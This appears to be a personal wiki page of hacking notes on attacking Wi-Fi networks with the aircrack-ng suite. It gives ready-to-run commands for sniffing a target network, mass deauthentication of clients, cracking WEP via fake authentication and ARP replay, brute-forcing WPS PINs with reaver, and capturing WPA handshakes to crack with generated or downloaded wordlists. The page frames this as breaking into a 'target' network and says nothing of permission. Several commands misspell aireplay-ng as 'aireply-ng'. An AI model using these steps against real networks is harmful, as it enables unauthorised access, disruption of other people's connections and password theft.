====== Wireless: Hack ======

===== Packet Sniffing (airodump) =====

**man page:** airodump-ng is used for packet capturing of raw 802.11 frames for the
intent of using them with air‐ crack-ng.  NOTE: Ctrl-c to exit. Syntax:
  * General wireless packet sniffing is done with ''airodump-ng'', part of the [[https://www.aircrack-ng.org/documentation.html|aircrack-ng]] suite.
  * This will give you general information about the wireless **//__networks__//** around you.

Syntax:

<code>airodump-ng [options] <interface name></code>

Must first enable monitor mode ([[hack_wireless_setup#change_adapter_mode|see here]]). Then run (assuming interface name wlan0): 

<code>
airodump-ng wlan0             # 2.4Ghz only, quicker
airodump-ng --band a wlan0    # 5Ghz, quicker
airodump-ng --band abg wlan0  # 5Ghz + 2.4Ghz, slower
</code>

Once you find a target network in the information provided by ''airodump'', move on... 

----

===== Targeted Sniffing =====

Here you specify the target network (BSSID + Channel) you want to play with...

**Target One Specific Network:** From the general sniff of all traffic you just did, copy the target BSSID and Channel number: 
  * Run it without ''--write filename'' if you just want to see the network and clients on that network.
  * You will see two sections: the top is the network, the bottom shows the clients ("stations") on the network.

<code>airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0</code>

This creates files in your current working directory (filename*.*).
  * .cap file: data captured (everything sent to and from target network)
  * If the router is set to encrypt, all the data captured will be encrypted

**Wireshark:** use it to analyze the data you captured... open the .cap file.

----

===== DeAuth Attack =====

**Deauthentication Attack:** Disconnect any client from any network...

**Tool:** ''aireplay-ng''

<code>
aireplay-ng --deauth=10000000 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0
# program     repeat lots        MAC: access point      MAC: client     wireless adapater
</code>

Option -a is the MAC address of the access point and ''-c'' the client machine on the network you are deauthenticating.
  * Remember: to get a client MAC address, you run airodump-ng and specify the network in order to see all the clients. The clients show up in the second (lower) block of information, under STATION: 

<code>airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X wlan0</code>

This still may fail unless you are also running ''airodump-ng'' against the target network (the command just above).

----

===== Encryption =====

  * If your target is wired, you simply connect to it and you're in.
  * If your target is wireless w/o encryption, you connect and you're in.
  * If your target is wireless + encryption... you need to break in.

----

==== WEP ====

WEP: Wired Equivalent Privacy  (Old & Easy)

**Tool:** ''aircrack-ng'' (used to crack WEP's Initialization Vector for the key stream)
  * The IV is sent in plain text (24-bit randomly generated number)
  * The IV is prepended (as a prefix) to the WEP key for decryption of packets
  * IV + Key (password) = Key Stream

All you need to do is capture a bunch of packets (''airodump-ng''), analyze the captured IVs (''aircrack-ng'') and discover the WEP key.
  - Capture specific BSSID + Channel as above. Store capture in file.
    * The ''#DATA'' column shows the number of useful packets w/ unique WEP IVs.
    * The higher the number the more likely you'll be able to crack the key.
  - Run ''aircrack-ng'' against your ''airodump-ng'' capture (.cap) file.

<code>aircrack-ng filename.cap</code>

Take the key from ''aircrack'' (XX:XX:XX:XX:XX), remove the colons, and use that number to log into the network. 

**PROBLEM:** If the network isn't busy enough, the ''#DATA'' will not increase enough.

**SOLUTION:** Generate your own traffic... force access point to generate new IVs.
  * Run an "arpreplay" attack
  * We cannot //connect// to the AP but we can //associate// with it.

**TOOL:** ''aireply-ng''

1. Run ''airodump-ng'' against your target network (as above) in one term window:
<code>airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0</code>

2. Associate with this network with ''aireply-ng'' in another term window: 
<code>
aireply-ng --fakeauth 0 -a [MAC of target router] -h [MAC of wireless adapter] wlan0
# run fake authentication attack once ("0")
</code>

3. Now communicate with the network with which you are associated via ''aireply-ng'': 
  * Inject packets into router to force it to generate new IVs.
  * Use an ARP reply/request attack...
  * THEORY: capture an ARP packet, re-transmit it thus forcing the router to produce another packet with new IV. Lather, rinse, repeat.

<code>aireply-ng --arpreplay -b [MAC of target router] -h [MAC of wireless adapter] wlan0</code>

4. Then run aircrack-ng (filename should be something like arpreplay-01.cap)
<code>aircrack-ng filename.cap</code>

----

==== WPA & WPA2 ====

The only difference is the ecryption method: WPA uses TKIP and WPA2 uses CCMP. The same methods will work with both WPA and WPA2.

----

=== WPS Misconfiguration Exploit===

WPS (allows clients to connect without the password).
  * Originally provided to simplify connecting printers and other peripherals.
  * "PBC": Push Button Configuration (peripherals and router had a WPS button).
  * Authenticates against an 8-digit PIN (8 numbers). Easy hack.
  * Router, however, must be misconfigured to use PIN authentication, NOT the PBC.
  * Check this first (since WPA/WPA2 are so difficult to crack).

1. TOOL: ''wash'' (display all networks with WPS enable). You may need to put your wireless interface into auto mode instead of monitor mode.

<code>
wash --interface wlan0     # if this errors out, do the following...
ifconfig wlan0 down        # or ifdown wlan0
iwconfig wlan0 mode auto
ifconfig wlan0 up          # or ifup wlan0
wash --interface wlan0     # remember to change mode back to monitor for the hacks
</code>

2. Associate with the network (as above)... set this up but **//DO NOT RUN IT YET//**...

<code>
aireply-ng --fakeauth 30 -a [MAC of target router] -h [MAC of wireless adapter] wlan0
# associate with the target network every 30 seconds
</code>

3. In another term window run ''reaver'' to brute force the PIN: 

<code>reaver --bssid [MAC of target router] --channel [#] --interface wlan0 -vvv --no-associate</code>

4. Launch ''reaver'' and then your ''aireply-ng'' you set up but did not run.

  * If WPS is not misconfigured or PBC is set... then this won't work. Move on...

----

=== WPA/WPA2 CRACKING ===

The only packets that can aid cracking WPA and WPA2 are the handshake packets.
  * These are 4 packets sent when a client connects to the network.
  * Here's the process...

1. Run ''airodump-ng'' against all reachable networks...

<code>
airodump-ng wlan0               # 2.4Ghz only, quicker
airodump-ng --band a wlan0      # 5Ghz, quicker
airodump-ng --band abg wlan0    # 5Ghz + 2.4Ghz, slower
</code>

2. Find your target router and run ''airodump-ng'' to dump data to a file...

<code>airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0</code>

3. Let it run and wait for the handshake to occur (someone to connect to router).

4. If you're impatient, deauthenticate a current user and he'll connect again, giving you the handshake you want.

<code>
aireplay-ng --deauth 4 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0
# program     repeat 4x   MAC addr router      MAC addr client to disconnect
</code>

5. Use that WPA handshake value to get the key for the wireless network (see next).

6. Wordlist: a very large text file of words to use against the handshake value
  * You can either create one of your own or download one (or combine the two).

**Create your own word list with ''crunch''**

<code>
crunch [min] [max] [characters] -t [pattern] -o [filename]   # syntax
crunch 6 8 123abc$ -t a@@@@b -o wordlist                     # example
</code>

^  option  ^  description  ^
| min | minimum number of characters for the password to be generated |
| max | maximum number of characters for the password to be generated |
| characters | specificy the characters you want to generate passwords from |
| pattern | if you know something about the password (e.g., starts w/ "a") |

**Links to wordlists:*
  * ftp://ftp.openwall.com/pub/wordlists/
  * http://www.openwall.com/mirrors/
  * https://github.com/danielmiessler/SecLists
  * http://www.outpost9.com/files/WordLists.html
  * http://www.vulnerabilityassessment.co.uk/passwords.htm
  * http://packetstormsecurity.org/Crackers/wordlists/
  * http://www.ai.uga.edu/ftplib/natural-language/moby/
  * http://www.cotse.com/tools/wordlists1.htm
  * http://www.cotse.com/tools/wordlists2.htm
  * http://wordlist.sourceforge.net/

7. Use aircrack-ng: wordlist + handshake to crack the password
  * ''aircrack-ng'' will unpack the handshake and extract the useful information
  * The MIC (Message Integrity Code) from the handshake is used by the access point to verify whether a password is correct or not.
  * It will take each word in the wordlist, combine it with the information in the handshake, and generate a MIC.
  * It will compare that MIC with the MIC in the handshake. If they match, your word is the password.
  * TAKE-AWAY: Success depends on your word list.
  * This will take a lot of time. If you have a GPU, it can be used to speed up the comparison process.
  * Make sure you are in the directory with your airodump-ng .cap file (that captured the handshake) and the .txt wordlist... 

<code>
aircrack-ng filename-01.cap -w wordlist.txt
#           |--> name of file from the airodump-ng
</code>

----

We'll have some more goodies later...  :-)